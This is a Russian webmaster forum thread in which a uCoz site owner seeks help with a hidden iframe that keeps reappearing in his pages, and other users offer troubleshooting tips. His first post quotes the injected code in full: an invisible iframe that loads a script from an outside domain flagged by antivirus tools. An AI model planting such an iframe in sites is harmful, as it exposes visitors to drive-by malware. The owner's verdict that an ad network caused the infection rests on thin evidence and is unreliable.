X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> на сайте iframe с вирусом. Что делать?, Сам добавляется iframe код на сайт
veatone
veatone
Topic Starter сообщение 30.1.2011, 1:24; Ответить: veatone
Сообщение #1


Здравстуйте!

У меня такая ситуация, на сайте стал сам по себе появляться вот такой код: <iframe src="http://imdbvideo.ru/il/stat.php" width="3" height="2" style="visibility: hidden;"></iframe> , на который ругаются антивирусники.

При его удалении, через некоторое время он сам появляеться, в большенстве случаев на форуме и в верхней части шаблона которая находиться на всех страницах сайта. Сайт на юкозе. Обращался к ним, так толком ничего путного не ответили, вот и написал тут.

При этом я добавлял код вот этой системы на сайт advmaker.ru (думаю знаете что это), на все страницы кроме главной. Так может это из-за нее добавляется iframe код на страницы?
Кто пользуется этой системой, ни у кого не было таких проблем с iframeМОМ? Может у кого-то такое случалось и без добавления кода от advmaker.ru ? Посоветуйте что делать? Пароли меняю уже второй раз, думал может ломают меня.
2
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seohazard
seohazard
сообщение 30.1.2011, 1:33; Ответить: seohazard
Сообщение #2


Если есть дырка в сайте то хоть каждый час пароли меняйте все равно не поможет.
(veatone @ 29.1.2011, 23:24) *
При этом я добавлял код вот этой системы на сайт advmaker.ru (думаю знаете что это),

Пунктуация.. "Казнить нельзя помиловать". Вы владелец advmaker.ru?
Попробуйте удалить код партнерки, если не поможет возвращайте и проверяйтесь на дыры, вирусы.


--------------------
SEO услуги населению.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
veatone
veatone
Topic Starter сообщение 30.1.2011, 16:25; Ответить: veatone
Сообщение #3


(seohazard @ 29.1.2011, 22:33) *
Пунктуация.. "Казнить нельзя помиловать". Вы владелец advmaker.ru?
Попробуйте удалить код партнерки, если не поможет возвращайте и проверяйтесь на дыры, вирусы.

Да удалил, сейчас будем смотреть. Всмыcле на дыры? Я понимаю что уязвимые места, но именно какие и как их найти?)

(seohazard @ 29.1.2011, 22:33) *
Вы владелец advmaker.ru?

Как вы думаете?)

Кто еще что нибудь может посоветовать?

Проверил логи входа в админку, не обнаружиль чужих ip адрессов. Только администраты входили.Значит это может быть 2 варианта или advmaker.ru или сам юкоз такое творит.

Сообщение отредактировал veatone - 30.1.2011, 16:25
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Marsianin
Marsianin
сообщение 30.1.2011, 16:40; Ответить: Marsianin
Сообщение #4


За advmaker.ru не замечал такого ( пока что).
Хотя всё может.
Как давно эта беда появилась?


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
veatone
veatone
Topic Starter сообщение 30.1.2011, 19:39; Ответить: veatone
Сообщение #5


(Marsianin @ 30.1.2011, 13:40) *
Как давно эта беда появилась?

Ну первый раз где-то неделю назад.

(Marsianin @ 30.1.2011, 13:40) *
За advmaker.ru не замечал такого ( пока что).

Ну впринципе у них не должно быть вирусов, так как там только реклама в основном маил ру игр. Проверял на други сайтах, которые тоже используют advmaker.ru, но не обнаружил у них этого кода. Так что у меня проскакивает такая мысль что это сами юкозовцы. Хотя какой им смысл?На свои же сайты вирусы кидать.

1. Не кто даже не пробывал фходить в админку кроме самих админов, это проверенно. Если конечно нельзя стерать, а там вроде нелзя стерать логи.
2. Никто не замечал такого за advmaker.ru
3. Сами админы такого кода не ставили
и
4. Остается юкоз.
Если я что-то пропустил и можно как то проверить напишите

P.S. Уважаемые модератторы, поменяйте в названии "Iframe на сайте с вирусо" на "вирусом" пожалуйста.

Сообщение отредактировал veatone - 30.1.2011, 19:39
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Marsianin
Marsianin
сообщение 31.1.2011, 16:19; Ответить: Marsianin
Сообщение #6


Читал где-то на форуме, что через сообщения или вставку BB кодов могут впихнуть.
Может стоит закрыть все возможные вариации вставки гиперссылки или кода на сайт\форум\блог.
Посмотреть, если опять появится, то даже и не знаю что делать дальше.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
veatone
veatone
Topic Starter сообщение 1.2.2011, 0:43; Ответить: veatone
Сообщение #7


(Marsianin @ 31.1.2011, 13:19) *
Читал где-то на форуме, что через сообщения или вставку BB кодов могут впихнуть.
Может стоит закрыть все возможные вариации вставки гиперссылки или кода на сайт\форум\блог.
Посмотреть, если опять появится, то даже и не знаю что делать дальше.

Да мне тоже сюпорт написал сделать так. Сделал будем следить.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
veatone
veatone
Topic Starter сообщение 4.2.2011, 1:32; Ответить: veatone
Сообщение #8


Уже почти неделю никакого кода не появляется. Код от системы advmaker.ru не ставил

Вывод, все это из-за advmaker.ru

Так что будьте осторожны. если хотите заработать на сайте, то ставьте, а если он для людей, то осторожнее с этой системой, она несет вирусы.

Сообщение отредактировал veatone - 4.2.2011, 1:32
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Илюха
Илюха
сообщение 4.2.2011, 16:18; Ответить: Илюха
Сообщение #9


Тоже одно время появлялся айфрейм в Dle движке, он дырявый если у вас он то удивляться нечему. Помогли установки прав доступа на папки и файлы, после этого ничего больше замечено не было.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
veatone
veatone
Topic Starter сообщение 4.2.2011, 19:49; Ответить: veatone
Сообщение #10


(Илюха @ 4.2.2011, 13:18) *
Тоже одно время появлялся айфрейм в Dle движке, он дырявый если у вас он то удивляться нечему. Помогли установки прав доступа на папки и файлы, после этого ничего больше замечено не было.

Можно подробнее об этом? Просто у меня сайт на юкозе. Я там не видел установки прав. Только на дле делал раньше
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Во что сегодня инвестировать?
Делимся своими приносящими прибыль вариантами
69 traveliver 4447 25.3.2024, 6:48
автор: Skyworker
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыВо что Вы играете?
399 Vmir 67502 23.3.2024, 12:51
автор: Alexand3r
Горячая тема (нет новых ответов) CryptoCloud — прием USDT, BTC, ETH, LTC на любом сайте
34 CryptoCLoud 10069 18.3.2024, 16:56
автор: CryptoCLoud
Открытая тема (нет новых ответов) Странный трафик на сайте длительное время
26 TABAK 7511 16.3.2024, 17:31
автор: Boymaster
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыБыстрый и качественный обмен на сайте Baksman.org
Обмен Bitcoin, BTC-e, PM, Qiwi, Yandex money, Карты банк
51 Baksman 33207 15.3.2024, 21:14
автор: Baksman


 



RSS Текстовая версия Сейчас: 28.3.2024, 21:26
Дизайн